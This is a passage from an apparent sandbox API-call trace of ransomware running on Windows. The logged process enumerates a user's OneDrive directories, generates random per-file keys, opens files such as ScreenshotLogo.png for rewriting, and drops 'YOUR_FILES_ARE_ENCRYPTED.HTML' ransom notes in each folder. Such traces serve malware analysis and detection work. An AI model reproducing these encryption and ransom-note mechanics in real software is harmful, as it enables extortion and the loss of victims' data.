returned 4 [0162.052] PathFindExtensionW (pszPath="RemoteAccess.dll") returned=".dll" [0162.052] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\RemoteAccess.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\remoteaccess.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0162.053] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=761000) returned 1 [0162.053] GetProcessHeap () returned 0x270000 [0162.053] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0162.057] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="56") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="58") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="48") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="2A") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="41") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="57") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="0D") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="11") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="9E") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="A4") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="A8") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="A5") returned 2 [0162.057] wsprintfW 
(in: param_1=0x4ebd142, param_2="%02X" | out: param_1="B2") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="B6") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="85") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="AD") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="CE") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="59") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="C3") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="07") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="F4") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="43") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="1A") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="2A") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="47") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="D5") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="96") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="18") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="93") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="9E") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="7A") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="1A") returned 2 [0162.059] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\RemoteAccess.dll" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\RemoteAccess.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\RemoteAccess.dll" [0162.059] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0162.059] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0162.059] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa93f61b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96577b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa96577b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ro", cAlternateFileName="")) returned 1 [0162.059] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro") returned 74 [0162.059] GetProcessHeap () returned 0x270000 [0162.059] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.059] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro" [0162.059] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro\\*") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro\\*" [0162.059] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa93f61b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96577b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa96577b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.060] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa93f61b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96577b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa96577b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.060] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa96577b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96577b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa96577b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.060] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro\\FileSync.LocalizedResources.dll.mui") 
returned 110 [0162.060] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.060] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.060] lstrlenW (lpString=".mui") returned 4 [0162.060] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.060] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa96577b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96577b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa96577b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.060] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.060] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ro\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0162.061] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.064] CloseHandle (hObject=0x594) returned 1 [0162.064] 
GetProcessHeap () returned 0x270000 [0162.065] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.065] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa96577b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9d2f6f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9d2f6f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ru", cAlternateFileName="")) returned 1 [0162.065] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru") returned 74 [0162.065] GetProcessHeap () returned 0x270000 [0162.065] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.065] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru" [0162.065] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru\\*" [0162.065] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa96577b0, ftCreationTime.dwHighDateTime=0x1d709b9, 
ftLastAccessTime.dwLowDateTime=0xa9d2f6f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9d2f6f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.065] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa96577b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9d2f6f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9d2f6f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.066] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9d2f6f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9d2f6f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9d2f6f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126a8, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.066] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.066] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.066] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.066] lstrlenW (lpString=".mui") returned 4 [0162.066] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.066] FindNextFileW 
(in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9d2f6f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9d2f6f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9d2f6f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126a8, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.066] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.066] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ru\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0162.066] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.069] CloseHandle (hObject=0x594) returned 1 [0162.069] GetProcessHeap () returned 0x270000 [0162.070] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.070] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9d2f6f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9fb6e50, 
ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9fb6e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="rw", cAlternateFileName="")) returned 1 [0162.070] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw") returned 74 [0162.070] GetProcessHeap () returned 0x270000 [0162.070] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.070] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw" [0162.070] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw\\*" [0162.070] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9d2f6f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9fb6e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9fb6e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.071] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: 
lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9d2f6f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9fb6e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9fb6e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.071] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9fb6e50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9fb6e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9fb6e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126a8, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.071] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.071] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.071] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.071] lstrlenW (lpString=".mui") returned 4 [0162.071] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.071] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9fb6e50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9fb6e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9fb6e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, 
nFileSizeLow=0x126a8, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.071] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.071] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\rw\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0162.072] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.074] CloseHandle (hObject=0x594) returned 1 [0162.075] GetProcessHeap () returned 0x270000 [0162.076] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.076] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa477def0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa477def0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa477def0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x124b, dwReserved0=0x0, dwReserved1=0x60, cFileName="ScreenshotLogo.png", cAlternateFileName="SCREEN~1.PNG")) returned 1 [0162.076] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotLogo.png") returned 90 [0162.076] lstrcmpW (lpString1="ScreenshotLogo.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.076] PathFindExtensionW (pszPath="ScreenshotLogo.png") returned=".png" [0162.076] lstrlenW (lpString=".png") returned 4 [0162.076] PathFindExtensionW (pszPath="ScreenshotLogo.png") returned=".png" [0162.077] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotLogo.png" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\screenshotlogo.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0162.077] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=4683) returned 1 [0162.077] GetProcessHeap () returned 0x270000 [0162.077] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0162.083] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="C9") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="7C") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="57") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="DA") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="62") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="A8") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="28") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="1E") returned 2 [0162.083] wsprintfW (in: 
param_1=0x4ebd132, param_2="%02X" | out: param_1="67") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="D8") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="77") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="B4") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="6B") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="DF") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="83") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="D8") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="57") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | 